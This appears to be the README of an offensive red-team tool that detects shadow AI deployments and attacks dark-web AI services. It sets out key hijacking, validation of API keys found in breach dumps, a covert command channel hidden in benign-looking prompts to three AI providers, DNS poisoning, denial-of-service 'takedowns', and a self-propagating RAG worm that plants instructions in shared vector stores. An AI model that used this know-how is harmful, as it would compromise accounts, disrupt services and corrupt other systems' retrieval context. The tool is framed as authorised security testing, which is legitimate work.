SPECTER SHADOW
T87 · v1.0.0 · Dark Web & Shadow AI Attack Engine
SPECTER SHADOW hunts unauthorised AI deployments on your network and attacks dark web AI infrastructure via Tor. Eight subsystems span shadow AI detection, dark web enumeration, marketplace exploitation, covert C2, resolver poisoning, RAG worm propagation, breach intelligence, and signed reporting.
What is SPECTER SHADOW
Shadow AI — employees spinning up personal AI deployments using their own API keys or running unapproved LLM wrappers on internal servers — represents one of the fastest-growing attack surfaces in enterprise environments. SPECTER SHADOW operationalises this attack surface: it detects shadow AI, validates the keys, and demonstrates the full exploitation chain.
The second mission is the dark web AI ecosystem. Uncensored LLM marketplaces (WormGPT, FraudGPT, DarkGPT) operate as criminal-as-a-service platforms on Tor. SPECTER SHADOW enumerates them, probes their auth and censorship controls, and at DESTROY gate can execute targeted degradation operations.
All findings are captured in Ed25519-signed SHD-{hex12} reports with SHA-256 hash-chained evidence suitable for use in security assessments and legal proceedings.
Installation
# Clone the repository (private — requires authorisation)
git clone https://github.com/RichardBarron27/red-specter-specter-shadow
cd red-specter-specter-shadow
# Install in editable mode (Python 3.11+)
pip install -e .
# Verify installation
specter-shadow --version
# Generate signing keypair
specter-shadow pubkeyDependencies
| Package | Version | Purpose |
|---|---|---|
| typer | ≥0.12.0 | CLI framework |
| httpx | ≥0.27.0 | HTTP requests (GHOST, BAZAAR, HARVEST, CONDUIT) |
| stem | ≥1.8.2 | Tor circuit management (DESCENT) |
| cryptography | ≥42.0.0 | Ed25519 signing (REPORT) |
| pydantic | ≥2.6.0 | Data models and validation |
| rich | ≥13.7.0 | CLI output rendering |
Quickstart
# 1. Scan for shadow AI keys in home directory (PASSIVE gate — no authorisation needed)
specter-shadow ghost scan --home
# 2. Parse a breach dump for credentials and API keys
specter-shadow harvest parse breach.txt
# 3. Enumerate dark web AI services via Tor (OPEN gate)
specter-shadow descent enum --tor-host 127.0.0.1 --tor-port 9050 --gate OPEN
# 4. Validate discovered keys against live endpoints (INJECT gate — requires scope file)
specter-shadow harvest validate findings.json --gate INJECT --scope shadow_scope.json8 Subsystems
SPECTER SHADOW is composed of 8 subsystems, each independently invocable via the CLI.
Gate requirements are enforced at runtime — attempting a higher-gate operation without
a valid scope file raises GateError.
| ID | Subsystem | Minimum Gate | Purpose |
|---|---|---|---|
| SS-01 | GHOST | PASSIVE / INJECT | Shadow AI key detection and hijacking |
| SS-02 | DESCENT | OPEN | Tor circuit and dark web AI enumeration |
| SS-03 | BAZAAR | INJECT / DESTROY | Dark web LLM marketplace exploitation |
| SS-04 | CONDUIT | DESTROY | 3-provider XOR secret-sharing C2 mesh |
| SS-05 | RESOLVER | INJECT | Onion-resolver poisoning (7 templates) |
| SS-06 | CORPUS | DESTROY | Self-propagating RAG worm (CVE-2026-52001) |
| SS-07 | HARVEST | PASSIVE / INJECT | Breach dump parsing and live key validation |
| SS-08 | REPORT | PASSIVE | Ed25519-signed SHD-{hex12} report generation |
Gate System
SPECTER SHADOW uses a 4-level gate system. Gate levels are ordered and inclusive: DESTROY access implies INJECT, OPEN, and PASSIVE access.
| Gate | Value | Description |
|---|---|---|
| PASSIVE | 0 | Local detection only — no outbound connections to targets |
| OPEN | 1 | Read-only network access via Tor — enumerate, do not modify |
| INJECT | 2 | Active exploitation — key validation, auth bypass, resolver injection |
| DESTROY | 3 | Destructive operations — takedown, C2, RAG worm injection |
--scope.
Attempting these gates without a scope file raises GateError with exit code 1.
Scope File
{
"target": "example.onion",
"operator": "red-team-op-007",
"gate": "INJECT",
"unleashed_inject": true,
"unleashed_destroy": false,
"authorised_by": "Richard B.",
"engagement_id": "ENG-2026-001"
}SS-01: GHOST — Shadow AI Detection
GHOST scans the local environment for API keys belonging to 14 AI providers.
It searches environment variables (current process, system-wide /etc/environment,
XDG config paths), configuration files (shell profiles, .env files, Docker configs,
Kubernetes manifests, IDE settings), and proxy log content strings.
Supported Providers
OpenAI (sk-), Anthropic (sk-ant-api), Google AI (AIzaSy),
HuggingFace (hf_), Cohere (co-), Mistral (mist-),
Groq (gsk_), Together (tog-), Replicate (r8_),
Perplexity (pplx-), OpenRouter (sk-or-), AWS Bedrock
(AKIA), Azure OpenAI (endpoint + key pattern), Fireworks (fw-).
CLI: ghost scan
# Scan current user's home directory config files
specter-shadow ghost scan --home
# Scan additional paths (files, not directories)
specter-shadow ghost scan --home --extra /etc/environment /opt/app/.env
# Scan proxy log content for API key patterns
specter-shadow ghost scan --proxy-log /var/log/squid/access.logCLI: ghost hijack
# Hijack a discovered key (INJECT gate required)
specter-shadow ghost hijack --key OPENAI_API_KEY --provider openai --gate INJECT --scope shadow_scope.jsonSS-02: DESCENT — Dark Web Enumeration
DESCENT establishes a Tor circuit via stem and enumerates known dark web AI service endpoints. It probes each .onion address for HTTP responses, extracts service titles, and classifies each service by type.
Service Types
| Type | Description | Examples |
|---|---|---|
| UNCENSORED_LLM | Uncensored language model services | WormGPT, DarkGPT |
| LLM_MARKETPLACE | Multi-model API resellers | FraudGPT, EvilGPT |
| AI_TOOLING | Hacking tools powered by AI | AI phishing kits |
| CREDENTIAL_STORE | Credential and key markets | API key dumps |
| UNKNOWN | Unclassified AI-adjacent service | — |
CLI: descent enum
# Enumerate dark web AI services via local Tor (OPEN gate)
specter-shadow descent enum --tor-host 127.0.0.1 --tor-port 9050 --gate OPEN
# Use custom control port and password
specter-shadow descent enum --control-port 9051 --control-password "your-password" --gate OPENSS-03: BAZAAR — Dark Web Exploitation
BAZAAR exploits discovered dark web LLM services. BazaarExploiter probes
for authentication bypass, censorship evasion, and rate-limit characterisation.
BazaarTakedown (DESTROY gate) measures baseline latency then executes
congestion injection to degrade service availability.
Auth Bypass Techniques
7 techniques tested in sequence: header smuggling, parameter injection, token manipulation, cache poisoning, endpoint enumeration, credential stuffing, session fixation.
CLI: bazaar
# Probe a dark web service for auth bypass (INJECT gate)
specter-shadow bazaar exploit --service wormgpt --gate INJECT --scope shadow_scope.json
# DESTROY-gated takedown (measures baseline then degrades)
specter-shadow bazaar takedown --service http://wgpt4example.onion --gate DESTROY --scope shadow_scope.jsonSS-04: CONDUIT — XOR C2 Mesh
CONDUIT implements a covert command-and-control channel over three AI provider APIs. Commands are split into 3 shares using XOR secret sharing with per-provider derived keys. Each share is embedded as a benign-looking prompt to OpenAI, Anthropic, or Gemini. The traffic is cryptographically indistinguishable from normal AI API usage.
XOR Secret Sharing Protocol
Given command C, random padding P, and per-provider derived keys K0, K1, K2:
padded = C + P # pad to block boundary
share0 = padded XOR K0
share1 = padded XOR K1
share2 = padded XOR K2 XOR K0 XOR K1 # reconstruction share
recover = share0 XOR share1 XOR share2 # recovers padded
C = strip_padding(recover)
Each share is embedded in a natural-language prompt context using
embed_in_prompt(share, provider, index) before transmission.
The SOCKS proxy from the Tor circuit is applied to all three HTTP connections.
CLI: conduit send
# Send command via C2 mesh (DESTROY gate, all 3 provider API keys required)
specter-shadow conduit send "EXECUTE: enumerate targets" --gate DESTROY --scope shadow_scope.json
# Verify C2 channel health
specter-shadow conduit verify --gate DESTROY --scope shadow_scope.jsonOPENAI_API_KEY, ANTHROPIC_API_KEY, and
GOOGLE_API_KEY environment variables. Missing keys raise ShadowError.
SS-05: RESOLVER — Onion Resolver Poisoning
RESOLVER crafts malicious DNS-over-HTTPS responses targeting onion-resolver infrastructure used by AI agents. 7 injection templates are available.
Injection Templates
| Template | Description |
|---|---|
| dns_rebind | DNS rebinding — redirect .onion resolution mid-connection |
| ttl_manipulation | Artificially short TTL to force frequent re-resolution |
| wildcard_poison | Wildcard record injection to capture all subdomains |
| negative_cache_flood | NXDOMAIN flood to cache denial for legitimate records |
| cache_detonation | Mass TTL expiry to force simultaneous re-resolution storm |
| nxdomain_hijack | Convert NXDOMAIN to attacker-controlled A record |
| authority_spoof | Inject fake NS records pointing to attacker resolver |
CLI: resolver craft
# Craft a dns_rebind payload (INJECT gate)
specter-shadow resolver craft --target ai.example.onion --template dns_rebind --gate INJECT
# List all available templates
specter-shadow resolver craft --list-templatesSS-06: CORPUS — Self-Propagating RAG Worm
CORPUS implements the CVE-2026-52001 RAG worm propagation technique.
Adversarial document chunks are crafted to embed propagation instructions
that corrupt adjacent retrieval context in shared vector stores.
With branch_factor=3 and max_generations=4,
a single injected document can corrupt up to 81 downstream chunks.
CLI: corpus
# Craft a propagating worm document (DESTROY gate)
specter-shadow corpus craft --topic "AI safety compliance guidelines" --gate DESTROY
# Inject into target RAG store (DESTROY gate)
specter-shadow corpus inject --endpoint http://rag.internal/ingest --worm worm.json --gate DESTROYSS-07: HARVEST — Breach Intelligence
HARVEST provides a complete breach data processing pipeline. HarvestExtractor
parses breach dumps line-by-line using regex patterns for 14 AI provider key formats,
email addresses (corporate and personal), and password hashes.
CredentialValidator (INJECT gate) validates discovered API keys against
live provider endpoints. ExposureScorer calculates weighted exposure scores.
Extraction Patterns
| Type | Pattern | Score Weight |
|---|---|---|
| Live API key | Provider-specific prefixes | 25 (after validation) |
| Unvalidated API key | Provider-specific prefixes | 8 |
| Corporate email | @domain.tld where domain ≠ gmail/yahoo/etc. | 5 |
| Personal email | @gmail.com, @yahoo.com, etc. | 1.5 |
| Password hash | bcrypt $2b$, MD5 $1$, SHA $5$/$6$ | 2 |
Severity Thresholds
| Severity | Score |
|---|---|
| CRITICAL | ≥ 75 |
| HIGH | ≥ 50 |
| MEDIUM | ≥ 25 |
| LOW | ≥ 10 |
CLI: harvest
# Parse a breach dump (PASSIVE gate — no network connections)
specter-shadow harvest parse breach-dump.txt
# Validate extracted keys against live endpoints (INJECT gate)
specter-shadow harvest validate findings.json --gate INJECT --scope shadow_scope.json
# Score findings for exposure severity
specter-shadow harvest score findings.jsonSHD Report Format
All SPECTER SHADOW operations produce a SHD-{hex12} JSON report. The report ID is generated from 6 random bytes encoded as 12 lowercase hex characters.
{
"report_id": "SHD-a3f2c1d4e5b6",
"target": "example.onion",
"gate": "INJECT",
"timestamp": "2026-05-15T12:34:56Z",
"exposure_score": 87.5,
"severity": "CRITICAL",
"findings": [
{
"finding_id": "SHD-a3f2c1d4e5b6-F001",
"subsystem": "GHOST",
"title": "Live OpenAI API Key in Shell Profile",
"severity": "CRITICAL",
"description": "sk-***... found in /home/user/.zshrc",
"evidence": "OPENAI_API_KEY=sk-abc... (validated: 200 OK)",
"hash": "sha256:3f7a..."
}
],
"subsystem_summaries": [...],
"signature": "hex-encoded Ed25519 signature",
"public_key_pem": "-----BEGIN PUBLIC KEY-----..."
}Ed25519 Signing
Reports are signed using Ed25519 (RFC 8032). The signing key is generated at install
time and stored in the tool's data directory. The public key can be retrieved with
specter-shadow pubkey and distributed for report verification.
Evidence Chain
Each finding includes a SHA-256 hash of its content. The hash chain links each finding
to its predecessor: chain_hash = SHA-256(prev_hash + finding_bytes).
This ensures findings cannot be added, removed, or reordered without detection.
Environment Variables
| Variable | Subsystem | Purpose |
|---|---|---|
| OPENAI_API_KEY | CONDUIT | OpenAI provider for C2 mesh |
| ANTHROPIC_API_KEY | CONDUIT | Anthropic provider for C2 mesh |
| GOOGLE_API_KEY | CONDUIT | Gemini provider for C2 mesh |
| TOR_SOCKS_HOST | DESCENT | Tor SOCKS proxy host (default: 127.0.0.1) |
| TOR_SOCKS_PORT | DESCENT | Tor SOCKS proxy port (default: 9050) |
| TOR_CONTROL_PORT | DESCENT | Tor control port (default: 9051) |
| SHADOW_SIGNING_KEY | REPORT | Path to Ed25519 private key PEM |
MITRE Mapping
| Technique | ID | Subsystem |
|---|---|---|
| Valid Accounts | T1078 | GHOST, HARVEST |
| Adversary-in-the-Middle | T1557 | RESOLVER |
| Application Layer Protocol | T1071 | CONDUIT |
| Data from Cloud Storage | T1530 | HARVEST |
| Network Denial of Service | T1498 | BAZAAR (takedown) |
| LLM Prompt Injection | ATLAS AML.T0054 | CORPUS |
| Discover AI Artifacts | ATLAS AML.T0007 | GHOST, DESCENT |
| Craft Adversarial Data | ATLAS AML.T0043 | CORPUS, RESOLVER |